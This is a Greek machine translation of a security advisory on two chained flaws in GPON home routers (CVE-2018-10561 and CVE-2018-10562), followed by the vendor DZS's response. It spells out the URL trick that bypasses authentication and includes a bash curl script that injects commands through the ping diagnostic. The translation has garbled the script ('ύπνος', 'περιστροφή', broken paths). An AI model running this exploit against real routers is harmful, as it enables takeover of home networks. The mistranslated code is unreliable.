Το κρίσιμο ευπάθεια RCE βρίσκεται σε πάνω από ένα εκατομμύριο δρομολογητές Home GPON


Δύο σημαντικές ενημερώσεις μετά την δημοσίευση της έκθεσης:

  1. Η ερευνητική μας ομάδα δημιούργησε μια ενημερωμένη έκδοση κώδικα που μπορεί να βοηθήσει τους χρήστες που πραγματοποιούνται. Ελέγξτε το εδώ
  2. Οι λύσεις DASAN Zhone Solutions μας έστειλαν το σχόλιό τους στην έκθεση. Το επισυνάπτουμε "ως έχει" στο τέλος αυτής της σελίδας

ΣΦΑΙΡΙΚΗ ΕΙΚΟΝΑ:

Διεξήγαμε μια ολοκληρωμένη αξιολόγηση σχετικά με ορισμένους δρομολογητές οικιακών συσκευών GPON. Πολλοί δρομολογητές χρησιμοποιούν σήμερα GPON internet, και βρήκαμε έναν τρόπο να παρακάμψουμε τον έλεγχο ταυτότητας στις συσκευές (CVE-2018-10561). Με αυτήν την παράκαμψη ταυτότητας, είμαστε επίσης σε θέση να παρουσιάσουμε μια άλλη ευπάθεια εγχύσεων εντολών (CVE-2018-10562) και να εκτελέσετε εντολές στη συσκευή.

Εκμετάλλευση:

Κατά την ανάλυση των υλικών του GPON, εντοπίσαμε δύο διαφορετικά κρίσιμα σημεία ευπάθειας (CVE-2018-10561 & CVE-2018-10562) που θα μπορούσαν, όταν συνδυαστούν, να επιτρέψουν τον πλήρη έλεγχο της συσκευής και συνεπώς του δικτύου. Το πρώτο θέμα ευπάθειας εκμεταλλεύεται τον μηχανισμό ελέγχου ταυτότητας της συσκευής που παρουσιάζει ελάττωμα. Αυτό το ελάττωμα επιτρέπει σε οποιονδήποτε εισβολέα να παρακάμψει τον έλεγχο ταυτότητας.

Το ελάττωμα μπορεί να βρεθεί με τους διακομιστές HTTP, οι οποίοι ελέγχουν για συγκεκριμένες διαδρομές κατά τον έλεγχο ταυτότητας. Αυτό επιτρέπει στον εισβολέα να παρακάμπτει τον έλεγχο ταυτότητας σε οποιοδήποτε τελικό σημείο χρησιμοποιώντας ένα απλό τέχνασμα.

Με την προσθήκη εικόνων / στη διεύθυνση URL, ο εισβολέας μπορεί να παρακάμψει το τελικό σημείο.

Αυτό λειτουργεί και στις δύο σελίδες HTML και στο GponForm /

Για παράδειγμα, εισάγοντας

/menu.html?images/
ή
/ GponForm / diag_FORM? Εικόνες /

μπορούμε να διαχειριστούμε τη συσκευή.

Εξετάζοντας τις λειτουργίες της συσκευής, παρατηρήσαμε ότι το διαγνωστικό τελικό σημείο περιείχε τις εντολές ping και traceroute. Δεν χρειάστηκε πολύ να καταλάβουμε ότι οι εντολές μπορούν να εγχυθούν από την παράμετρο του κεντρικού υπολογιστή.

Δεδομένου ότι ο δρομολογητής αποθηκεύει τα αποτελέσματα ping στο / tmp και το μεταδίδει στο χρήστη όταν ο χρήστης ξαναδίνει /diag.html, είναι πολύ απλό να εκτελέσετε εντολές και να ανακτήσετε την έξοδο τους με την ευπάθεια παράκαμψης ταυτότητας.

Περιλαμβάνουμε την ακόλουθη έκδοση bash του κώδικα εκμετάλλευσης:
#! / bin / bash

echo "[+] Αποστολή της εντολής ..."
# Στέλνουμε τις εντολές με δύο λειτουργίες backtick (`) και ερωτηματικό (?), Επειδή διάφορα μοντέλα ενεργοποιούν σε διαφορετικές συσκευές
curl -k -d "XWebPageName = διάγνωση&diag_action = ping&wan_conlist = 0&dest_host = \ '$ 2 \'; $ 2&ipv = 0 "$ 1 / GponForm / diag_Form? images / 2>/ dev / null 1>/ dev / null
echo "[+] Αναμονή ...".
ύπνος 3
echo "[+] Ανάκτηση της εξόδου ...".
περιστροφή -k $ 1 / diag.html? images / 2>/ dev / null | grep 'diag_result =' | sed-e '/ \\ n / \ n / g'

Επίπτωση:

Το GPON είναι ένας τύπος παθητικού οπτικού δικτύου που χρησιμοποιεί οπτικές ίνες και είναι ιδιαίτερα δημοφιλές. Όταν οι χρήστες χρησιμοποιούν το GPON, οι δρομολογητές παρέχονται από τους ISP. Στο βίντεο, μπορείτε να το δείτε πάνω από ένα εκατομμύριο άνθρωποι χρησιμοποιούν αυτόν τον τύπο δρομολογητή συστήματος δικτύου.

Δοκιμάσαμε αυτήν την ευπάθεια σε πολλούς τυχαίους δρομολογητές GPON και η ευπάθεια βρέθηκε σε όλα αυτά. Επειδή τόσοι πολλοί άνθρωποι χρησιμοποιούν αυτούς τους τύπους δρομολογητών, αυτό το θέμα ευπάθειας μπορεί να οδηγήσει σε ένα ολόκληρο συμβιβασμό δικτύου.

Συστάσεις:

  1. Ελέγξτε εάν ο δρομολογητής σας χρησιμοποιεί το δίκτυο GPON.
  2. Να γνωρίζετε ότι οι δρομολογητές GPON μπορούν να τεθούν σε πειρατεία και να εκμεταλλευτούν.
  3. Συζητήστε με τον ISP σας για να δείτε τι μπορούν να κάνουν για να διορθώσουν το σφάλμα.
  4. Προειδοποιήστε τους φίλους σας στο Facebook (κάντε κλικ εδώ για να μοιραστείτε) και το Twitter (κάντε κλικ εδώ για να tweet).

Ενημέρωση: Δήλωση από την DZS σχετικά με την εκμετάλλευση παράκαμψης ταυτότητας

Η DASAN Zhone Solutions, Inc. διερεύνησε τις πρόσφατες αναφορές των μέσων ενημέρωσης ότι ορισμένες DZS GPON Network Interface Devices (NIDs), πιο γνωστές ως δρομολογητές, θα μπορούσαν να είναι ευάλωτες σε ένα παράκαμματο παράκαμψης ταυτότητας.

Η DZS έχει διαπιστώσει ότι η σειρά ZNID-GPON-25xx και ορισμένα GPON ONTs H640series, όταν λειτουργούν σε συγκεκριμένες εκδόσεις λογισμικού, επηρεάζονται από αυτήν την ευπάθεια. Καμία από τις επιπτώσεις της υπηρεσίας αυτής της ευπάθειας δεν έχει αναφερθεί μέχρι σήμερα στην DZS. Μετά από μια εσωτερική έρευνα, διαπιστώσαμε ότι ο πιθανός αντίκτυπος είναι πολύ πιο περιορισμένος ως προς το πεδίο εφαρμογής από ό, τι αναφέρει ο vpnMentor. Σύμφωνα με τα αρχεία πωλήσεων της DZS, σε συνδυασμό με τα δεδομένα πεδίου που συγκεντρώθηκαν μέχρι σήμερα, εκτιμήσαμε ότι ο αριθμός μονάδων GPON ONT που μπορεί να είναι ενδεχομένως επηρεάζονται λιγότερο από 240.000. Επιπλέον, δεδομένης της σχετικής ωριμότητας των προϊόντων στον κύκλο ζωής τους, πιστεύουμε ότι ο αντίκτυπος περιορίζεται σε ακόμη λιγότερες συσκευές.

Ιστορικό προϊόντος

Το DZS ZNID-GPON-25xx και ορισμένες ONTs της σειράς H640, συμπεριλαμβανομένου του λογισμικού που εισήγαγε αυτήν την ευπάθεια, αναπτύχθηκαν από έναν προμηθευτή ΚΑΕ και μεταπωλήθηκαν από την DZS. Σχεδιασμένο και κυκλοφόρησε πριν από περισσότερα από 9 χρόνια, τα περισσότερα από αυτά τα προϊόντα έχουν πλέον ξεπεράσει τη βιώσιμη διάρκεια ζωής τους. Επειδή τα συμβόλαια υποστήριξης λογισμικού δεν προσφέρονται πλέον για τα περισσότερα από αυτά τα προϊόντα, δεν έχουμε άμεση εικόνα για τον συνολικό αριθμό μονάδων που εξακολουθούν να χρησιμοποιούνται ενεργά στον τομέα.

Ανάλυση

Η DZS ενημέρωσε όλους τους πελάτες που αγόρασαν αυτά τα μοντέλα για την ευπάθεια. Συνεργαζόμαστε με κάθε πελάτη για να βοηθήσουμε τους να αξιολογήσουν τις μεθόδους αντιμετώπισης του προβλήματος για μονάδες που ενδέχεται να εξακολουθούν να εγκαθίστανται στο πεδίο. Θα είναι στη διακριτική ευχέρεια του κάθε πελάτη να αποφασίσει πώς να αντιμετωπίσει τον όρο για τον εξοπλισμό που αναπτύσσει.

Η αποστολή της DZS είναι να διασφαλίσει ότι όλες οι λύσεις της ανταποκρίνονται στα υψηλότερα πρότυπα ασφάλειας της βιομηχανίας. Αγκαλιάζουμε αυτό, και κάθε ευκαιρία, για να επανεξετάσουμε και να βελτιώνουμε συνεχώς τις μεθόδους σχεδιασμού και δοκιμών ασφάλειας.

Brayan Jackson
Brayan Jackson Administrator
Sorry! The Author has not filled his profile.
follow me